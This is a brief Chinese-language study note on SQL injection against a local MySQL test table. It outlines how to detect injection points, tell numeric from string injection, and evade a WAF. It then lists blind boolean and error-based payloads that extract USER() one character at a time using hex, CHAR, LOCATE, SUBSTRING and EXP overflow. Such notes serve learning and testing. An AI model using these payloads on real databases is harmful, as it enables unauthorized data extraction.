sql注入笔记

笔记记录

流程

1.确定sql注入(利用 ‘ ,and进行逻辑拼接判断注入点)

2.确定注入类型，这里是数值型(name做字符型注入)

3.绕waf(hex或char)

代码

Create Table
CREATE TABLE `test` (
  `id` int(11) DEFAULT NULL,
  `name` varchar(200) DEFAULT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8

SELECT * FROM test WHERE id ='1' OR 1=2;#判断

SELECT * FROM test WHERE NAME="zhangsan";
SELECT * FROM test WHERE NAME="1/(USER() LIKE 'r%')";



SELECT * FROM test WHERE id =1/(USER() LIKE 'r%');
SELECT * FROM test WHERE id =1/(USER() LIKE 0x7225);
SELECT * FROM test WHERE id =1/(USER() LIKE CHAR(114,37));
SELECT * FROM test WHERE id =1/(USER()
 LIKE
  'r%');
SELECT * FROM test WHERE id =1/(USE/*zhushi*/R() LIKE 'r%');  #未成功

SELECT * FROM test WHERE id =1/(USER() LIKE CONCAT('r','%'));

SELECT * FROM test WHERE id =1/(INSTR(USER(),'r')=1);


SELECT * FROM test WHERE id =1/(POSITION('r' IN USER())=1);


SELECT * FROM test WHERE id =1/(LOCATE('r',USER())=1);

SELECT * FROM test WHERE id =1/(LOCATE('o',CURRENT_USER,2)>0);

SELECT * FROM test WHERE id =1/(SUBSTRING(USER(),2,1)='o');

SELECT * FROM test WHERE id =1/(1 AND EXP(710-1));	

SELECT * FROM test WHERE id =1/(1 AND EXP(710-SUBSTRING(USER(),1,1)='r'));

###